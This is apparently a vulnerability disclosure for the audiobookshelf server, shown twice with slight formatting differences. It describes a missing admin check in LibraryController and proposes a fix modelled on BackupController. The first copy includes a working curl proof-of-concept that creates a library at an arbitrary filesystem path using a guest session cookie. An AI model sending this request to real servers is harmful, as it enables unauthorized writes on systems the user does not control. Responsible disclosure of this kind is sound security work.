Summary
Greetings Team, Me and Kartik discovered a path traversal issue (more like abusing an admin feature as a non-admin user) which makes the vulnerability lie between path traversal and RBAC issues.
Details
Non-admin user is not allowed to create libraries (or access only the ones they have permission to). However, the LibraryController is missing the check for admin user and thus allows this vulnerability.
|
async create(req, res) { |
|
const newLibraryPayload = { |
|
...req.body |
|
} |
|
if (!newLibraryPayload.name || !newLibraryPayload.folders || !newLibraryPayload.folders.length) { |
We believe that allowing non-admin users to write to any directory in the system can be seen as a form of path traversal. However, since it can be restricted to only admin permissions, fixing this is relatively simple and falls more into the realm of Role-Based Access Control (RBAC).
PoC
Create a user with no permissions:
A POC would be to send a request like so:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 10.0.0.162:3333' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0' -H $'Accept: application/json, text/plain, */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/json' -H $'Content-Length: 468' -H $'Origin: http://10.0.0.162:3333' -H $'Connection: keep-alive' -H $'Referer: http://10.0.0.162:3333/config/libraries' -H $'Priority: u=0' \
-b $'connect.sid=<GUEST_COOKIE>' \
--data-binary $'{\"name\":\"Nishant-hacked-1.txt\",\"provider\":\"google\",\"folders\":[{\"fullPath\":\"/tmp/nishant-kartik-poc.txt\"}],\"icon\":\"database\",\"mediaType\":\"text\",\"settings\":{\"coverAspectRatio\":1,\"disableWatcher\":false,\"skipMatchingMediaWithAsin\":false,\"skipMatchingMediaWithIsbn\":false,\"autoScanCronExpression\":null,\"hideSingleBookSeries\":false,\"onlyShowLaterBooksInContinueSeries\":false,\"metadataPrecedence\":[\"folderStructure\",\"audioMetatags\",\"nfoFile\",\"txtFiles\",\"opfFile\",\"absMetadata\"]}}' \
$'http://10.0.0.162:3333/api/libraries'I am also attaching a video POC for the same: https://www.loom.com/share/58f28fa857e44807857f19987ef1d696
Fix
Using a similar RBAC check used in the other files, should do the trick. (Like in BackupController for upload functionality)
|
if (!req.user.isAdminOrUp) { |
|
Logger.error(`[BackupController] Non-admin user "${req.user.username}" attempting to access backups`) |
|
return res.sendStatus(403) |
|
} |
We can have something similar for LibraryController. You can find the fix PR here #pull1
Impact
Missing RBAC check allows non-admin users to write folders anywhere in the system.
realArcherL Reporter
DoMINAToR98 Reporter
Summary
Greetings Team, Me and Kartik discovered a path traversal issue (more like abusing an admin feature as a non-admin user) which makes the vulnerability lie between path traversal and RBAC issues.
Details
Non-admin user is not allowed to create libraries (or access only the ones they have permission to). However, the
LibraryControlleris missing the check for admin user and thus allows this vulnerability.audiobookshelf/server/controllers/LibraryController.js
Lines 43 to 47 in 1c0d6e9
We believe that allowing non-admin users to write to any directory in the system can be seen as a form of path traversal. However, since it can be restricted to only admin permissions, fixing this is relatively simple and falls more into the realm of Role-Based Access Control (RBAC).
PoC
Create a user with no permissions:
A POC would be to send a request like so:
I am also attaching a video POC for the same: https://www.loom.com/share/58f28fa857e44807857f19987ef1d696
Fix
Using a similar RBAC check used in the other files, should do the trick. (Like in
BackupControllerfor upload functionality)audiobookshelf/server/controllers/BackupController.js
Lines 165 to 168 in e53ac65
We can have something similar for
LibraryController. You can find the fix PR here #pull1Impact
Missing RBAC check allows non-admin users to write folders anywhere in the system.